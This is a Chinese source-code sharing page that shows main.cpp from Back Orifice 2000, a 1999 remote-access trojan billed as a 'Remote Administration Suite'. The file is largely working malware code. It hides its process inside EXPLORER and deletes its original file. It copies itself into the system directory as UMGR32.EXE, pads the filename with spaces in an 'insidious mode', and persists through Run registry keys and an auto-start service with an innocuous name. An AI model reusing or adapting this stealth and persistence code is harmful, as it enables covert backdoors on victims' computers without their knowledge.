开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
main.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:15k
源码类别:

远程控制编程

开发平台:

WINDOWS

main.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. // ************************************************
  21. //         BO2K                         cDc 
  22. //                 Back Orifice 2000
  23. //         Written By DilDog and Sir Dystic
  24. //    Copyright (C) 1999,  Cult of the Dead Cow
  25. //  Special thanks to L0pht Heavy Industries, Inc.
  26. // ************************************************
  28. #include<windows.h>
  29. #include<main.h>
  30. #include<bo_debug.h>
  31. #include<functions.h>
  32. #include<plugins.h>
  33. #include<osversion.h>
  34. #include<bocomreg.h>
  35. #include<comm_native.h>
  36. #include<commandloop.h>
  37. #include<dll_load.h>
  38. #include<config.h>
  39. #include<pviewer.h>
  40. #include<process_hop.h>
  42. #ifdef NDEBUG
  43. #define HOOK_PROCESS
  44. //#define HIDE_COPY
  45. #endif
  47. HMODULE g_module=NULL;
  48. HANDLE g_hfm=NULL;
  49. DWORD g_dwThreadID=0;
  51. BOOL g_bRestart=FALSE;
  52. char g_svRestartProcess[64];
  53. BOOL g_bEradicate=FALSE;
  55. // --------------- Stealth options ----------------
  56. char g_svStealthOptions[]="<**CFG**>Stealth"
  57. #ifdef HIDE_COPY
  58.   "B:Run at startup=1"
  59.   "B:Delete original file=1"
  60.   "B:Insidious mode=0"
  61. #else
  62.   "B:Run at startup=0"
  63.   "B:Delete original file=0"
  64.   "B:Insidious mode=0"
  65. #endif
  66.                           "S[64]:Runtime pathname=UMGR32.EXE....................................................."
  67. #ifdef HOOK_PROCESS   
  68.   "B:Hide process=1"
  69. #else
  70.   "B:Hide process=0"
  71. #endif
  72.   "S[48]:Host process name (NT)=EXPLORER......................................."
  73.   "S[48]:Service Name (NT)=Remote Administration Service..................";
  76. void EradicateBO2K(void)
  77. {
  78. char *svRunRegKey;
  79. char *svTarget=GetCfgStr(g_svStealthOptions,"Runtime pathname");
  81. // Eradicate from run key
  82. if(g_bIsWinNT) {
  83. svRunRegKey="SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
  84. } else {
  85. svRunRegKey="Software\Microsoft\Windows\CurrentVersion\RunServices";
  86. }
  87. HKEY key;
  89. RegOpenKey(HKEY_LOCAL_MACHINE,svRunRegKey,&key);
  90. RegDeleteValue(key,svTarget);
  91. RegCloseKey(key);
  93. if(g_bIsWinNT) {
  94. // Eradicate from user reg key
  95. RegOpenKey(HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run",&key);
  96. RegDeleteValue(key,svTarget);
  97. RegCloseKey(key);
  99. // Eradicate from service database
  100. SC_HANDLE scm=pOpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
  101. if(scm!=NULL) {
  102. SC_HANDLE srv=pOpenService(scm,GetCfgStr(g_svStealthOptions,"Service Name (NT)"),SERVICE_STOP|DELETE);
  103. if(srv!=NULL) {
  104. pDeleteService(srv);
  105. pCloseServiceHandle(srv);
  106. }
  107. pCloseServiceHandle(scm);
  108. }
  109. }
  111. }
  114. // Back Orifice Thread Entry Point 
  115. DWORD WINAPI EntryPoint(LPVOID lpParameter)
  116. {
  117. startofentrypoint:;
  118. g_bRestart=FALSE;
  120. g_module=(HMODULE)lpParameter;
  122. // Load up other DLLs just to make sure we have them (we're acting as a loader here).
  124. LoadLibrary("kernel32.dll");
  125. LoadLibrary("user32.dll");
  126. LoadLibrary("gdi32.dll");
  127. LoadLibrary("winspool.dll");
  128. LoadLibrary("advapi32.dll");
  129. LoadLibrary("shell32.dll");
  130. LoadLibrary("ole32.dll");
  131. LoadLibrary("oleaut32.dll");
  132. LoadLibrary("wsock32.dll");
  134. // Create useless window class
  135. WNDCLASS wndclass;
  136. wndclass.style = 0;
  137. wndclass.lpfnWndProc = DefWindowProc;
  138. wndclass.cbClsExtra = 0;
  139. wndclass.cbWndExtra = 0;
  140. wndclass.hInstance = g_module;
  141. wndclass.hIcon = NULL;
  142. wndclass.hCursor = NULL;
  143. wndclass.hbrBackground = NULL;
  144. wndclass.lpszMenuName = NULL;
  145. wndclass.lpszClassName = "WSCLAS";
  147. RegisterClass(&wndclass);
  149. // Determine OS version
  150. GetOSVersion();
  152. // Use Dynamic Libraries
  153. InitDynamicLibraries();
  155. // Enable permissions on Windows NT
  156. if(g_bIsWinNT) {
  157. HANDLE tok;
  158. if(pOpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&tok)) {
  159. LUID luid;
  160. TOKEN_PRIVILEGES tp;
  161. pLookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
  162. tp.PrivilegeCount=1;
  163. tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
  164. tp.Privileges[0].Luid=luid;
  165. pAdjustTokenPrivileges(tok,FALSE,&tp,NULL,NULL,NULL);
  167. pLookupPrivilegeValue(NULL,SE_SECURITY_NAME,&luid);
  168. tp.PrivilegeCount=1;
  169. tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
  170. tp.Privileges[0].Luid=luid;
  171. pAdjustTokenPrivileges(tok,FALSE,&tp,NULL,NULL,NULL);
  172. CloseHandle(tok);
  173. }
  174. }
  177. // Start up Command Dispatcher
  178. InitializeCommandDispatcher();
  180. // Initialize commands
  181. InitializeCommands();
  183. // Do Primary Command Loop
  184. CommandHandlerLoop();
  186. // Kill plugins
  187. TerminateCommands();
  189. // Kill Command Dispatcher
  190. KillCommandDispatcher();
  192. // Completely remove BO2K upon request
  193. if(g_bEradicate) {
  194. EradicateBO2K();
  195. }
  197. // Kill Dynamic Libraries
  198. KillDynamicLibraries();
  200. // Restart BO2K if desired
  201. if(g_bRestart) {
  202. if(g_svRestartProcess[0]=='') goto startofentrypoint;
  204. if(GetCfgBool(g_svStealthOptions,"Hide process") && g_bIsWinNT) {
  205. if(!SpawnBO2KThread(g_svRestartProcess)) 
  206. goto startofentrypoint;
  207. } else goto startofentrypoint;
  208. }
  210. return 0;
  211. }
  214. // WinMain: Program Entry Point
  215. extern "C" int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow);
  217. VOID WINAPI Handler( DWORD fdwControl ) 
  218. {
  220. }
  222. void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
  223. {
  224. SERVICE_STATUS_HANDLE ssh=pRegisterServiceCtrlHandler(GetCfgStr(g_svStealthOptions,"Service Name (NT)"), &Handler);
  226. SERVICE_STATUS ss;
  227. ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
  228. ss.dwCurrentState=SERVICE_RUNNING;
  229. ss.dwControlsAccepted=0;
  230. ss.dwWin32ExitCode=NO_ERROR;
  231. ss.dwCheckPoint=0;
  232. ss.dwWaitHint=0;
  233. pSetServiceStatus(ssh,&ss);
  235. EntryPoint(GetModuleHandle(NULL));
  237. ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
  238. ss.dwCurrentState=SERVICE_STOPPED;
  239. ss.dwControlsAccepted=0;
  240. ss.dwWin32ExitCode=NO_ERROR;
  241. ss.dwCheckPoint=0;
  242. ss.dwWaitHint=0;
  243. pSetServiceStatus(ssh,&ss);
  244. }
  246. int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow)
  247. {
  248. g_module=GetModuleHandle(NULL);
  249. GetOSVersion();
  250. InitDynamicLibraries();
  252. // Get stealth options
  253. BOOL bHideProcess=GetCfgBool(g_svStealthOptions,"Hide process");
  254. BOOL bRunAtStartup=GetCfgBool(g_svStealthOptions,"Run at startup");
  256. // Check for file to delete
  257. char *svCmdLine=GetCommandLine();
  258. while(svCmdLine[0]!='') {
  259. svCmdLine++;
  260. if((*(svCmdLine-1))==' ') break;
  261. }
  263. if(svCmdLine[0]!='') {
  264. if(GetCfgBool(g_svStealthOptions,"Delete original file")) {
  265. while(DeleteFile(svCmdLine)==0) {
  266. if(GetLastError()==ERROR_FILE_NOT_FOUND) break;
  267. Sleep(100);
  268. }
  269. }
  270. }
  272. // Determine how things should run at startup
  273. if(bRunAtStartup) {
  274. // Install levels:
  275. // 0: Not installed
  276. // 1: Installed, not run from anywhere
  277. // 2: Installed, run from user registry key
  278. // 3: Installed, run from system-wide registry key
  279. // 4: Installed, run as service
  280. int nInstall=0;
  282. char *svRunRegKey;
  283. if(g_bIsWinNT) {
  284. svRunRegKey="SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
  285. } else {
  286. svRunRegKey="Software\Microsoft\Windows\CurrentVersion\RunServices";
  287. }
  289. // Get current module location
  290. char svFileName[512];
  291. GetModuleFileName(g_module,svFileName,512);
  292. //MessageBox(NULL,svFileName,"File Name",MB_OK);
  294. // Get target installation pathname
  295. char svName[MAX_PATH];
  296. char svTargetName[MAX_PATH],*svFilePart;
  297. char *svTarget=GetCfgStr(g_svStealthOptions,"Runtime pathname");
  298. GetSystemDirectory(svName,MAX_PATH-1);
  299. lstrcat(svName,"\");
  300. lstrcpyn(svName+lstrlen(svName),svTarget,MAX_PATH-lstrlen(svName));
  301. GetFullPathName(svName,MAX_PATH,svTargetName,&svFilePart);
  303. // Add insidious extension
  304. if(GetCfgBool(g_svStealthOptions,"Insidious mode")) {
  305. memset(svTargetName+lstrlen(svTargetName),' ',MAX_PATH-lstrlen(svTargetName));
  306. svTargetName[MAX_PATH-2]='e';
  307. svTargetName[MAX_PATH-1]='';
  308. }
  310. // ------------- Determine current install level -----------------
  312. // ----- 1: Check for installation -----
  314. if(GetFileAttributes(svTargetName)!=0xFFFFFFFF) {
  315. nInstall=1;
  316. }
  318. // ----- 2: Check user registry key (NT only)
  319. if(nInstall==1 && g_bIsWinNT) {
  320. HKEY key;
  321. if(RegCreateKey(HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run",&key)==ERROR_SUCCESS) {
  322. DWORD len=512;
  323. char svRegPath[512];
  324. if(RegQueryValueEx(key,svFilePart,NULL,NULL,(BYTE *)svRegPath,&len)==ERROR_SUCCESS) {
  325. if(lstrcmpi(svRegPath,svTargetName)==0) {
  326. nInstall=2;
  327. }
  328. }
  329. }
  330. }
  331. // ----- 3: Check system-wide registry key
  332. if(nInstall==1) {
  333. HKEY key;
  334. if(RegCreateKey(HKEY_LOCAL_MACHINE,svRunRegKey,&key)==ERROR_SUCCESS) {
  335. DWORD len=512;
  336. char svRegPath[512];
  337. if(RegQueryValueEx(key,svFilePart,NULL,NULL,(BYTE *)svRegPath,&len)==ERROR_SUCCESS) {
  338. if(lstrcmpi(svRegPath,svTargetName)==0) {
  339. nInstall=3;
  340. }
  341. }
  342. }
  343. }
  345. // ----- 4: Check service database (NT only)
  346. if(nInstall==1 && g_bIsWinNT) {
  347. SC_HANDLE scm=pOpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
  348. if(scm!=NULL) {
  349. char svBuf[512];
  350. DWORD len;
  351. if(pGetServiceDisplayName(scm,GetCfgStr(g_svStealthOptions,"Service Name (NT)"),svBuf,&len)!=0) {
  352. nInstall=4;
  353. }
  354. pCloseServiceHandle(scm);
  355. }
  356. }
  358. // ------------- See if we can raise our install level ----------------
  359. int nOldInstall=nInstall;
  361. if(nInstall==0 || (lstrcmpi(svFileName,svTargetName)!=0)) {
  362. // Make copy of file
  363. while(CopyFile(svFileName,svTargetName,FALSE)==0) Sleep(1000);
  365. // And now run the copy, si
  366. STARTUPINFO si;
  367. PROCESS_INFORMATION pi;
  368. char svComLine[2048];
  369. lstrcpyn(svComLine,svTargetName,2048);
  370. lstrcpyn(svComLine+lstrlen(svComLine)," ",2048-lstrlen(svComLine));
  371. lstrcpyn(svComLine+lstrlen(svComLine),svFileName,2048-lstrlen(svComLine));
  372. memset(&si,0,sizeof(STARTUPINFO));
  373. si.cb=sizeof(STARTUPINFO);
  374. si.dwFlags=STARTF_FORCEOFFFEEDBACK;
  376. //MessageBox(NULL,svComLine,"Command Line before...",MB_OK);
  377. CreateProcess(NULL,svComLine,NULL,NULL,0,0,NULL,NULL,&si,&pi);
  379. KillDynamicLibraries();
  380. return 0;
  381. }
  383. if((nInstall>0) && (nInstall<4) && g_bIsWinNT) {
  384. SC_HANDLE scm=pOpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE);
  385. if(scm!=NULL) {
  386. char svBinary[1024];
  387. wsprintf(svBinary,""%s"",svTargetName);
  389. SC_HANDLE svc=pCreateService(scm,
  390. GetCfgStr(g_svStealthOptions,"Service Name (NT)"),
  391. GetCfgStr(g_svStealthOptions,"Service Name (NT)"),
  392. 0,
  393. SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
  394. SERVICE_AUTO_START,
  395. SERVICE_ERROR_IGNORE,
  396. svBinary,
  397. NULL,
  398. NULL,
  399. NULL,
  400. NULL,
  401. NULL);
  403. if(svc!=NULL) {
  404. nInstall=4;
  405. pCloseServiceHandle(svc);
  406. }
  407. pCloseServiceHandle(scm);
  408. }
  409. }
  411. if((nInstall>0) && (nInstall<3)) {
  412. HKEY key;
  413. if(RegOpenKey(HKEY_LOCAL_MACHINE,svRunRegKey,&key)==ERROR_SUCCESS) {
  414. if(RegSetValueEx(key,svTarget,0,REG_SZ,(BYTE *)svTargetName,lstrlen(svTargetName))==ERROR_SUCCESS) {
  415. nInstall=3;
  416. }
  417. RegCloseKey(key);
  418. }
  419. }
  421. if((nInstall>0) && (nInstall<2) && g_bIsWinNT) {
  422. HKEY key;
  423. if(RegOpenKey(HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run",&key)==ERROR_SUCCESS) {
  424. if(RegSetValueEx(key,svTarget,0,REG_SZ,(BYTE *)svTargetName,lstrlen(svTargetName))==ERROR_SUCCESS) {
  425. nInstall=2;
  426. }
  427. RegCloseKey(key);
  428. }
  429. }
  431. // ------------------- Clean up OLD install level ---------------------
  433. if(nInstall!=nOldInstall) {
  434. if(nOldInstall==2) {
  435. HKEY key;
  436. if(RegOpenKey(HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run",&key)==ERROR_SUCCESS) {
  437. RegDeleteValue(key,svFilePart);
  438. RegCloseKey(key);
  439. }
  440. }
  441. if(nOldInstall==3) {
  442. HKEY key;
  443. if(RegOpenKey(HKEY_LOCAL_MACHINE,svRunRegKey,&key)==ERROR_SUCCESS) {
  444. RegDeleteValue(key,svFilePart);
  445. RegCloseKey(key);
  446. }
  447. }
  448. }
  450. // Start BO2K Thread
  451. if(g_bIsWinNT && nInstall==4) {
  452. char svUserName[256];
  453. DWORD dwBufSize=256;
  454. GetUserName(svUserName,&dwBufSize);
  455. //MessageBox(NULL,svUserName,"UserName",MB_OK|MB_ICONINFORMATION|MB_TOPMOST|MB_SETFOREGROUND);
  456. if(lstrcmpi(svUserName,"SYSTEM")==0) {
  457. SERVICE_TABLE_ENTRY ste[2];
  458. ste[0].lpServiceName=GetCfgStr(g_svStealthOptions,"Service Name (NT)");
  459. ste[0].lpServiceProc=ServiceMain;
  460. ste[1].lpServiceName=NULL;
  461. ste[1].lpServiceProc=NULL;
  462. if(pStartServiceCtrlDispatcher(ste)>0) {
  463. KillDynamicLibraries();
  464. return 0;
  465. }
  466. } else {
  467. SC_HANDLE scm=pOpenSCManager(NULL,NULL,SC_MANAGER_CONNECT);
  468. if(scm!=NULL) {
  469. SC_HANDLE svc=pOpenService(scm,GetCfgStr(g_svStealthOptions,"Service Name (NT)"),SERVICE_START);
  470. if(svc!=NULL) {
  471. if(pStartService(svc,0,NULL)>0){
  472. pCloseServiceHandle(svc);
  473. pCloseServiceHandle(scm);
  474. KillDynamicLibraries();
  475. return 0;
  476. } else {
  477. if(GetLastError()==ERROR_SERVICE_ALREADY_RUNNING) {
  478. pCloseServiceHandle(svc);
  479. pCloseServiceHandle(scm);
  480. KillDynamicLibraries();
  481. return 0;
  482. }
  483. }
  484. pCloseServiceHandle(svc);
  485. }
  486. pCloseServiceHandle(scm);
  487. }
  488. }
  489. }
  490. }
  492. if(g_bIsWinNT) {
  493. char svUserName[256];
  494. DWORD dwBufSize=256;
  495. GetUserName(svUserName,&dwBufSize);
  496. if(lstrcmpi(svUserName,"LocalSystem")==0) {
  497. EntryPoint(GetModuleHandle(NULL));
  498. KillDynamicLibraries();
  499. return 0;
  500. }
  501. }
  503. if(bHideProcess) {
  504. // Hide process
  505. char *svProcess=GetCfgStr(g_svStealthOptions,"Host process name");
  506. SpawnBO2KThread(svProcess);
  507. } else {
  508. // ---------- Not process hiding ---------------
  509. EntryPoint(GetModuleHandle(NULL));
  510. }
  512. KillDynamicLibraries();
  513. return 0;
  514. }